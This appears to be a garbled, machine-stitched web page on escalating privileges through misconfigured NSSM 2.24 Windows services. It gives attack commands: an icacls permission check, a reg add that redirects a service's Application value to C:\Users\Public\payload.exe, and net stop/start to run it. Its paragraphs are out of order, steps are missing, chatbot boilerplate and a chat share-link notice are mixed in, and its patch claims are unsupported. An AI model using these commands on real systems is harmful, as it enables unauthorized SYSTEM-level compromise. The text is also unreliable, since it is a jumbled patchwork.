Nssm224 Privilege Escalation Updated Jun 2026

This technique was partially patched in Windows 11 23H2, but many enterprise LTSB/LTSC builds remain vulnerable.

The discovery of and the update to CVE-2024-51448 serve as a critical reminder that convenience tools like NSSM 2.24 become security liabilities when file permissions are misconfigured. While NSSM itself is not inherently malicious, its integration into enterprise installers often inherits the "lazy" security posture of the parent application. nssm224 privilege escalation updated

If a service path points to nssm.exe , the attacker investigates further using icacls to check the folder permissions of the application binary listed in the service configuration: icacls "C:\Program Files\TargetApp\" Use code with caution.

Alternatively, you can manually inspect common deployment paths like C:\Program Files\ , C:\nssm\ , or custom application directories. Step 2: Checking for Weak Registry Permissions This technique was partially patched in Windows 11

This public link is valid for 7 days and shares a thread, including any personal information you added. This link or copies made by others cannot be deleted. If you share with third parties, their policies apply. Can’t copy the link right now. Try again later.

To trigger the execution, the service must be restarted. If the low-privilege user has permissions to restart the service, they can execute: net stop ExampleService && net start ExampleService Use code with caution. If a service path points to nssm

reg add HKLM\SYSTEM\CurrentControlSet\Services\VulnerableService\Parameters /v Application /t REG_SZ /d "C:\Users\Public\payload.exe" /f Use code with caution. Step 4: Triggering Execution

: Continued updates to older vulnerabilities in Wowza Streaming Engine showed that the "Everyone" group was still being granted full access to nssm_x64.exe in certain configurations.